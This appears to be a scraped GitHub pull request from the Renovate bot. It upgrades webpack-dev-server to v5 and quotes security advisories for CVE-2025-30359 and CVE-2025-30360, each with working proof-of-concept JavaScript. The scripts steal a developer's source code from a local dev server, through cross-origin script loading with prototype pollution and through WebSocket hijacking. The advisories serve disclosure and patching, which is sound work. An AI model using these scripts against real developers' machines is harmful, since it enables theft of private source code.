Movatterモバイル変換

[0]ホーム
URL:

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

 Sign up
Appearance settings

chore(deps): update dependency webpack-dev-server to v5 [security]#1102

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to ourterms of service andprivacy statement. We’ll occasionally send you account related emails.

Already on GitHub?Sign in to your account

Open
renovate wants to merge1 commit intomaster
base:master
Choose a base branch
Loading
fromrenovate/npm-webpack-dev-server-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovaterenovatebot commentedJun 5, 2025
edited
Loading

Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn morehere.

This PR contains the following updates:

PackageChangeAgeConfidence
webpack-dev-server^4.15.1 ->^5.0.0ageconfidence

GitHub Vulnerability Alerts

CVE-2025-30359

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject<script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By usingFunction::toString against the values in__webpack_modules__, the attacker can get the source code.

PoC

  1. Downloadreproduction.zip and extract it
  2. Runnpm i
  3. Runnpx webpack-dev-server
  4. Openhttps://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
  5. You can see the source code output in the document and the devtools console.

image

The script in the POC site is:

letmoduleListconstonHandlerSet=(handler)=>{console.log('h',handler)moduleList=handler.require.m}constoriginalArrayForEach=Array.prototype.forEachArray.prototype.forEach=functionforEach(callback,thisArg){callback((handler)=>{onHandlerSet(handler)})originalArrayForEach.call(this,callback,thisArg)Array.prototype.forEach=originalArrayForEach}constscript=document.createElement('script')script.src='http://localhost:8080/main.js'script.addEventListener('load',()=>{console.log(moduleList)for(constkeyinmoduleList){constp=document.createElement('p')consttitle=document.createElement('strong')title.textContent=keyconstcode=document.createElement('code')code.textContent=moduleList[key].toString()p.append(title,':',document.createElement('br'),code)document.body.appendChild(p)}})document.head.appendChild(script)

This script uses the function generated byrenderRequire.

// The require functionfunction__webpack_require__(moduleId){// Check if module is in cachevarcachedModule=__webpack_module_cache__[moduleId];if(cachedModule!==undefined){returncachedModule.exports;}// Create a new module (and put it into the cache)varmodule=__webpack_module_cache__[moduleId]={// no module.id needed// no module.loaded neededexports:{}};// Execute the module functionvarexecOptions={id:moduleId,module:module,factory:__webpack_modules__[moduleId],require:__webpack_require__};__webpack_require__.i.forEach(function(handler){handler(execOptions);});module=execOptions.module;execOptions.factory.call(module.exports,module,module.exports,execOptions.require);// Return the exports of the modulereturnmodule.exports;}

Especially, it uses the fact thatArray::forEach is called for__webpack_require__.i andexecOptions contains__webpack_require__.
It uses prototype pollution againstArray::forEach to extract__webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you useoutput.iife: false and access a malicious web site.

Details

Whenoutput.iife: false is set, some global variables for the webpack runtime are declared on thewindow object (e.g.__webpack_modules__).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject<script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on thewindow object.
By usingFunction::toString against the values in__webpack_modules__, the attacker can get the source code.

I pointed outoutput.iife: false, but if there are other options that makes the webpack runtime variables to be declared on thewindow object, the same will apply for those cases.

PoC

  1. Downloadreproduction.zip and extract it
  2. Runnpm i
  3. Runnpx webpack-dev-server
  4. Openhttps://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
  5. Open the devtools console.
  6. You can see the content ofsrc/index.js and other scripts loaded.

image

The script in the POC site is:

constscript=document.createElement('script')script.src='http://localhost:8080/main.js'script.addEventListener('load',()=>{for(constmoduleinwindow.__webpack_modules__){console.log(`${module}:`,window.__webpack_modules__[module].toString())}})document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that hasoutput.iife: false option set and uses a predictable port and output path for the entrypoint script.

CVE-2025-30360

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

TheOrigin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported byCVE-2018-14732.
But webpack-dev-server always allows IP addressOrigin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described inthe article linked fromCVE-2018-14732, the attacker get the source code.

related commit:webpack/webpack-dev-server@72efaab (note thatcheckHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due tothe non-HTTPS private access blocking feature.

PoC

  1. Downloadreproduction.zip and extract it
  2. Runnpm i
  3. Runnpx webpack-dev-server
  4. Openhttp://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
  5. Editsrc/index.js in the extracted directory
  6. You can see the content ofsrc/index.js

image

The script in the POC site is:

window.webpackHotUpdate=(...args)=>{console.log(...args);for(iinargs[1]){document.body.innerText=args[1][i].toString()+document.body.innerTextconsole.log(args[1][i])}}letparams=newURLSearchParams(window.location.search);lettarget=newURL(params.get('target')||'http://127.0.0.1:8080');letfile=params.get('file')letwsProtocol=target.protocol==='http:' ?'ws' :'wss';letwsPort=target.port;varcurrentHash='';varcurrentHash2='';letwsTarget=`${wsProtocol}://${target.hostname}:${wsPort}/ws`;ws=newWebSocket(wsTarget);ws.onmessage=event=>{console.log(event.data);if(event.data.match('"type":"ok"')){s=document.createElement('script');s.src=`${target}${file}.${currentHash2}.hot-update.js`;document.body.appendChild(s)}r=event.data.match(/"([0-9a-f]{20})"/);if(r!==null){currentHash2=currentHash;currentHash=r[1];console.log(currentHash,currentHash2);}}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

Release Notes

webpack/webpack-dev-server (webpack-dev-server)

v5.2.1

Compare Source

Security
  • cross-origin requests are not allowed unless allowed byAccess-Control-Allow-Origin header
  • requests with an IP addresses in theOrigin header are not allowed to connect to WebSocket server unless configured byallowedHosts or it different from theHost header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes
  • prevent overlay for errors caught by React error boundaries (#​5431) (8c1abc9)
  • take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#​5411) (ffd0b86)

v5.2.0

Compare Source

Features
  • addedgetClientEntry andgetClientHotEntry methods to get clients entries (dc642a8)
Bug Fixes
  • speed up initial client bundling (145b5d0)

v5.1.0

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added theapp option to beFunction (by default only withconnect compatibility frameworks) (3096148)
  • allow theserver option to beFunction (#​5275) (02a1c6d)
  • http2 support forconnect andconnect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.4

Compare Source

Security
  • cross-origin requests are not allowed unless allowed byAccess-Control-Allow-Origin header
  • requests with an IP addresses in theOrigin header are not allowed to connect to WebSocket server unless configured byallowedHosts or it different from theHost header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes
  • prevent overlay for errors caught by React error boundaries (#​5431) (8c1abc9)
  • take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#​5411) (ffd0b86)

v5.0.3

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added theapp option to beFunction (by default only withconnect compatibility frameworks) (3096148)
  • allow theserver option to beFunction (#​5275) (02a1c6d)
  • http2 support forconnect andconnect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.2

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added theapp option to beFunction (by default only withconnect compatibility frameworks) (3096148)
  • allow theserver option to beFunction (#​5275) (02a1c6d)
  • http2 support forconnect andconnect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.1

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added theapp option to beFunction (by default only withconnect compatibility frameworks) (3096148)
  • allow theserver option to beFunction (#​5275) (02a1c6d)
  • http2 support forconnect andconnect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.0

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added theapp option to beFunction (by default only withconnect compatibility frameworks) (3096148)
  • allow theserver option to beFunction (#​5275) (02a1c6d)
  • http2 support forconnect andconnect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

Configuration

📅Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated byMend Renovate. View therepository job log.

@renovaterenovatebotforce-pushed therenovate/npm-webpack-dev-server-vulnerability branch 6 times, most recently fromd49b417 toe9956e3CompareAugust 1, 2025 14:04
@renovaterenovatebotforce-pushed therenovate/npm-webpack-dev-server-vulnerability branch 2 times, most recently fromabd9478 tocbf5252CompareAugust 13, 2025 15:45
@renovaterenovatebotforce-pushed therenovate/npm-webpack-dev-server-vulnerability branch fromcbf5252 to13111b0CompareAugust 19, 2025 18:54
@renovaterenovatebotforce-pushed therenovate/npm-webpack-dev-server-vulnerability branch from13111b0 to8731adeCompareAugust 31, 2025 12:53
Sign up for freeto join this conversation on GitHub. Already have an account?Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

[8]ページ先頭
©2009-2025 Movatter.jp